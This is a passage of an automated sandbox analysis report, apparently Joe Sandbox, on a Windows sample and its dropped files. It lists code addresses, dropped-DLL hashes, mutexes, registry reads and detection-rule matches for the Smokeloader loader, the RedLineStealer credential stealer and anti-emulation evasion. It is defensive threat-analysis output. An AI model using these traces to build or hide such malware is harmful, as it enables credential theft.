                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0215B2B77_2_0215B2B7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021463DB7_2_021463DB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021280577_2_02128057
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021420677_2_02142067
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021561177_2_02156117
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021251577_2_02125157
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021241E77_2_021241E7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0212F6677_2_0212F667
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021256A77_2_021256A7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021536E77_2_021536E7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021367397_2_02136739
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021237D77_2_021237D7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021264577_2_02126457
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021464EB7_2_021464EB
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_021475BA7_2_021475BA
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02126A177_2_02126A17
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02140AE77_2_02140AE7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02124BD77_2_02124BD7
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02145F557_2_02145F55
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0215AF977_2_0215AF97
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_02128C077_2_02128C07
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeCode function: 11_2_0427AB1011_2_0427AB10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E8D2012_2_6D1E8D20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D18AD5012_2_6D18AD50
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12ED7012_2_6D12ED70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F6D9012_2_6D0F6D90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D064DB012_2_6D064DB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1ECDC012_2_6D1ECDC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D126C0012_2_6D126C00
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13AC3012_2_6D13AC30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06AC6012_2_6D06AC60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D05ECC012_2_6D05ECC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BECD012_2_6D0BECD0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D066F1012_2_6D066F10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A0F2012_2_6D1A0F20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0CEF4012_2_6D0CEF40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D122F7012_2_6D122F70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A8FB012_2_6D1A8FB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06EFB012_2_6D06EFB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13EFF012_2_6D13EFF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D060FE012_2_6D060FE0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D140E2012_2_6D140E20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FEE7012_2_6D0FEE70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E6E9012_2_6D0E6E90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06AEC012_2_6D06AEC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D100EC012_2_6D100EC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B690012_2_6D0B6900
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D09896012_2_6D098960
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1209B012_2_6D1209B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F09A012_2_6D0F09A0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11A9A012_2_6D11A9A0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D17C9E012_2_6D17C9E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0949F012_2_6D0949F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B082012_2_6D0B0820
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0EA82012_2_6D0EA820
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13484012_2_6D134840
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1668E012_2_6D1668E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D100BA012_2_6D100BA0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D166BE012_2_6D166BE0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D10EA0012_2_6D10EA00
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D118A3012_2_6D118A30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0DCA7012_2_6D0DCA70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0DEA8012_2_6D0DEA80
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A855012_2_6D1A8550
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B854012_2_6D0B8540
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D16454012_2_6D164540
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D10057012_2_6D100570
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C256012_2_6D0C2560
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0545B012_2_6D0545B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12A5E012_2_6D12A5E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0EE5F012_2_6D0EE5F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C442012_2_6D0C4420
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0EA43012_2_6D0EA430
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D07846012_2_6D078460
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D18A48012_2_6D18A480
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0A64D012_2_6D0A64D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FA4D012_2_6D0FA4D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E070012_2_6D0E0700
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D08A7D012_2_6D08A7D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BC65012_2_6D0BC650
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0846D012_2_6D0846D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BE6E012_2_6D0BE6E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FE6E012_2_6D0FE6E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D14413012_2_6D144130
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0D613012_2_6D0D6130
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C814012_2_6D0C8140
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0601E012_2_6D0601E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12801012_2_6D128010
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12C00012_2_6D12C000
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0AE07012_2_6D0AE070
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D05809012_2_6D058090
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13C0B012_2_6D13C0B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0700B012_2_6D0700B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0D232012_2_6D0D2320
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06834012_2_6D068340
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A237012_2_6D1A2370
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06237012_2_6D062370
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D17C36012_2_6D17C360
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F637012_2_6D0F6370
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0923A012_2_6D0923A0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BE3B012_2_6D0BE3B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B43E012_2_6D0B43E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12A21012_2_6D12A210
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13822012_2_6D138220
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F825012_2_6D0F8250
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E826012_2_6D0E8260
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D12E2B012_2_6D12E2B0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1322A012_2_6D1322A0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E62C012_2_6D1E62C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C3D0012_2_6D0C3D00
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D053D8012_2_6D053D80
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1A9D9012_2_6D1A9D90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D131DC012_2_6D131DC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D071C3012_2_6D071C30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D063C4012_2_6D063C40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D189C4012_2_6D189C40
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FFC8012_2_6D0FFC80
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D19DCD012_2_6D19DCD0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D121CE012_2_6D121CE0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D095F2012_2_6D095F20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D055F3012_2_6D055F30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1B7F2012_2_6D1B7F20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D081F9012_2_6D081F90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D17DFC012_2_6D17DFC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E3FC012_2_6D1E3FC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D10BFF012_2_6D10BFF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D16DE1012_2_6D16DE10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1BBE7012_2_6D1BBE70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E5E6012_2_6D1E5E60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D083EC012_2_6D083EC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1AF90012_2_6D1AF900
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11592012_2_6D115920
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0DF96012_2_6D0DF960
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11D96012_2_6D11D960
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13199012_2_6D131990
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D07198012_2_6D071980
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F99C012_2_6D0F99C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0999D012_2_6D0999D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C59F012_2_6D0C59F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F79F012_2_6D0F79F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BD81012_2_6D0BD810
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FF8C012_2_6D0FF8C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13F8F012_2_6D13F8F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06D8E012_2_6D06D8E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0938E012_2_6D0938E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1BB8F012_2_6D1BB8F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0ABB2012_2_6D0ABB20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13FB6012_2_6D13FB60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D145B9012_2_6D145B90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D051B8012_2_6D051B80
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D129BB012_2_6D129BB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B9BA012_2_6D0B9BA0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0A7BF012_2_6D0A7BF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D101A1012_2_6D101A10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D09FA1012_2_6D09FA10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D15DA3012_2_6D15DA30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E9A5012_2_6D1E9A50
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13DAB012_2_6D13DAB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D061AE012_2_6D061AE0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1AF51012_2_6D1AF510
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C750012_2_6D0C7500
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D07551012_2_6D075510
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D09959012_2_6D099590
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E55F012_2_6D0E55F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0ED41012_2_6D0ED410
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D14943012_2_6D149430
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D1ED930 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D199F30 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D1EDAE0 appears 75 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D083620 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D1E09D0 appears 317 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: String function: 6D089B10 appears 103 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: String function: 004087A0 appears 54 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: String function: 0040F5A0 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: String function: 02128A07 appears 57 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: String function: 0212F807 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                    Source: xvJv1BpknZ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/36@11/10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,12_2_6D0C0300
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeCode function: 0_2_0215614A CreateToolhelp32Snapshot,Module32First,0_2_0215614A
                    Source: C:\Users\user\AppData\Local\Temp\5876.exeCode function: 7_2_0042B20E CoCreateInstance,7_2_0042B20E
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\etrtabdJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5876.tmpJump to behavior
                    Source: xvJv1BpknZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
